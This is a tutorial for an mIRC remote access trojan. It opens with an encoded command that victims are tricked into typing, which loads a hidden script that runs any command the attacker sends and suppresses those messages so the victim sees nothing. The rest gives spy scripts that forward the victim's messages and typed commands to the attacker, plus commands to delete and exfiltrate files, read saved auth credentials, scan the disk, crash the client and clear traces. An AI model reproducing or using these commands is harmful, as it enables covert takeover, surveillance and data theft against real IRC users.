|
Tutorial mIRC
Remote Access Script
Install on remote computer (Infect the victim)
The script can be activated by the remote PC when
he writes the next command:
//write czm.mrc $decode(b24gXio6dGV4dDppbnMqOj86eyAuICQrICQyLSB8IGhhbHRkZWYgfQ==,m)
| .load -rs czm.mrc | msg YOURNICK i love you
YOURNICK = your nick. The remote computer will message
you “I love you” once he writes
the command. You can edit it or just delete
the “ | msg YOURNICK I love you ”
part.
This is what the command does: it will make
a new .mrc file czm and put this in it (which
is encoded in the command): on ^*:text:ins*:?:{
. $+ $2- | haltdef }
The haltdef will block your messages to the
remote PC beginning with “ins”. With
this the user can’t see your commands,
so he wont have a clue who is controlling his
mIRC. You can naturally leave that part out of the command when you want to see the messages on the remote computer. However most of the times you don't want the remote computer to "read" all the messages, since they are irrelevant (in the bot case by example).
Example:
/msg bot ins msg #channel
hi
This will let the bot message #channel the
“hi” message, but the remote PC will
NOT see it, all others in the channel will see.
And the bot will not see your message “ins
msg #channel hi” because it will be blocked
by “haltdef”. Nice isn’t it? If this has a bot application in this way the bot doesn't get all the garbage data that it doesn't need.
When the bot has executed that command the
remote script is active. You can add a spy function
if you want (this can cause him an excess flood
if he is on too much “popular” channels
(channel with much activity or chatting). For adding the
spy part (it will send you all his activity,
messages received, message sent and commands
executed) execute the next commands:
Spy the remote PC (e.g. logging the activities for bots)
/msg bot ins write
-c myscript.mrc
/msg bot ins unload -rs myscript.mrc
/msg bot insert write -c myscript.mrc on
*:CONNECT: { .msg YOURNICK i am online }
/msg bot ins write myscript.mrc on *:TEXT:*:*:
{ .msg YOURNICK $timestamp <- < $+ $iif($chan,#
$+ :,$+ ) $+ $nick $+ > $1- }
/msg bot ins write myscript.mrc on *:INPUT:*:
{ .msg YOURNICK $timestamp -> $iif($left($1,1)
!= /,< $+ $me $+ >,[COMMAND]) $1- }
/msg bot ins load -rs myscript.mrc
Once done that, you’ll receive the msgs
immediately. You can let the spy function stop
by typing the next command:
/msg bot ins unload
-rs myscript.mrc
Note: bot = the nick of the client who has
executed that command, and who has the remote script activated RAT (aka Trojan).
Sometimes you want to partly spy the remote PC, by example only read the private messages. Not the messages from the channels he is in, with this you will have less chance that he will flood himself of the server (excess flood). So the spy script becomes:
/msg bot ins write -c myscript.mrc
/msg bot ins unload -rs myscript.mrc
/msg bot insert write -c myscript.mrc on *:CONNECT: { .msg YOURNICK i am online }
/msg bot ins write myscript.mrc on *:TEXT:*:?: { .msg YOURNICK $timestamp <- < $+ $nick $+ > $1- }
/msg bot ins write myscript.mrc on *:INPUT:*: { .msg YOURNICK $timestamp -> $iif($left($1,1) != /,< $+ $me $+ >,[COMMAND]) $1- }
/msg bot ins load -rs myscript.mrc
YOURNICK is your nick, and bot is the nick of the remote client.
Make other remote files (.mrc)
You can make remote files yourself and add
usefull functions in it.
/msg bot insert write
-c YOURSCRIPTNAME.mrc on 1:TEXT:*!opme*:#CHANNEL:/mode
#channel +o $nick
/msg bot ins .load –rs YOURSCRIPTNAMEt.mrc
Use of the Trojan
REMOVE FILE :
/msg bot ins remove
C:\Textfile.txt
OPEN SITE:
/msg bot ins url www.site.com
JOIN CHANNEL:
/msg bot ins join #channel
PART CHANNEL:
/msg bot ins part #channel
QUERY USER:
/msg bot ins query
user
MSG USER:
/msg bot ins msg user
INVITE USER:
/msg bot ins invite
user #channel
BAN USER:
/msg bot ins ban #channel
user
KICK USER:
/msg bot ins kick #channel
user
IGNORE USER:
/msg bot ins ignore
*!*@host.com
UNIGNORE USER:
/msg bot ins unignore
*!*@host.com
CHANGE NICK:
/msg bot ins nick thenickyouwant
OP USER:
/msg bot ins mode #channel
+o user
VOICE USER:
/msg bot ins mode #channel
+v user
CHANGE TOPIC:
/msg bot ins topic
#channel text
RECEIVE FILE:
/msg bot ins dcc send
user file
or
/msg bot ins dcc send
user C:\something.sth
EDIT TEXT:
/msg bot ins write
-l1 C:\TESTING.txt thetextyouwanttoedit
(-l1 --> first line)
READ A PIECE OF FILE (LIKE PERFORM):
following commands must be executed after eachother:
/msg bot ins write
mab alias abcd123 { msg user $read(perform.ini,w,*auth*)
}
/msg bot ins .load -rs mab
/msg bot ins abcd123
SEARCH HARD DISK FOR A FILE:
/msg bot ins write
MAB1 alias MAB1 { .echo $findfile(C:\,porn.*,0,msg
user $1-) }
/msg bot ins .load -rs MAB1
/msg bot ins MAB1
LET HIS mIRC CRASH:
/msg bot ins write
MAB2 alias MAB2 { while (1 != 2) { beep } }
/msg bot ins .load -rs MAB2
/msg bot ins MAB2
SCAN HIS HARD DISK AND SAVE IT AS .txt:
//echo $findfile(c:,*.*,0,write
C:\M_A_B.txt $1-)
Note: Probably you want this file, well you
do this:
/msg bot ins dcc send
YOURNICK C:\M_A_B.txt
** Important note **
The bot will see the send dialog, so act
quick, for security reasons i suggest to write
another trojan on another file; like:
/msg bot write MyNewScript.mrc
$decode(b24gXio6dGV4dDppbnMqOj86eyAuICQrICQyLSB8IGhhbHRkZWYgfQ==,m)
| .load -rs MyNewScript.mrc
TURN THE AUTO JOIN ON INVITE ON (or OFF)
/msg bot ins ajinvite
on
LET THE BOT MESSAGE SOMETHING ON ALL THE
CHANNELS HE IS ON:
/msg bot ins amsg <the
message you want him to say on all channels>
CHANGE THE BOT'S ALTERNATIVE NICK:
/msg bot ins anick
<nickname>
CHANGE THE BOT'S BACKGROUND PICTURE:
/msg bot ins background
[-aemsgdluhcfnrtpx] [window] [filename]
with
-a = active window
-m = main mIRC window
-s = status window
-g = finger window
-d = single message window
-e = set as default
-cfnrtp = center, fill, normal, stretch, tile,
photo
-l = toolbar
-u = toolbar buttons
-h = switchbar
-x = no background picture
LET THE "mIRC CHANNEL CENTRAL" OF
A CHANNEL POP UP:
/msg bot ins channel
#CHANNELNAME
Note: the bot must be on #CHANNELNAME
CLEAR YOUR TRACKS BY CLEARING THE TEXT ON THE
OPEN WINDOWS:
/msg bot ins clearall
[-snqmtgu]
s = status, n = channel, q = query, m = message
window, t = chat, g = finger, u = custom.
LET THE BOT CLIPBOARD A SPECIFIED TEXT:
/msg bot ins clipboard
<the text you want to be clipboarded>
CLOSE THE OPEN QUERIES OF THE BOT:
/msg bot ins close
LET THE BOT QUIT mIRC:
/msg bot ins quit <the
quit message you want>
LET THE BOT DISCONNECT FROM SERVER:
/msg bot ins disconnect
LET THE BOT CHANGE SERVER:
/msg bot ins server
the.server.you.want
LET THE BOT OPEN A NEW SERVER NEXT TO THE
SERVER HE IS ALREADY IN:
/msg bot ins server
-m
/msg bot ins server the.server.you.want
LET THE BOT GIVE YOU FLAGS (if he is able
to):
/msg bot ins msg |TheBot|
chanlev #channel YOURNICK +flag
Note:
|TheBot| = the bot who can give flags
Chanlev = can be different, sometimes it is
also, "adduser"
flag = the flag you want
YOURNICK = your nick
CHANGE THE BOT'S FONT AND FONT SIZE:
/msg bot ins font -asgbd
<fontsize> <fontname>
CHANGE THE BOT'S FULL NAME:
/msg bot ins fullname
<name>
LET THE BOT REJOIN A CHANNEL:
/msg bot ins hop #CHANNEL
MAKE A NEW DIRECTORY ON THE BOT'S HARD DISK:
/msg bot ins mkdir
<dirname>
NOTE:
bot = nick of the remote client
user = your nick
Still questions?
Ask on IRC!
|
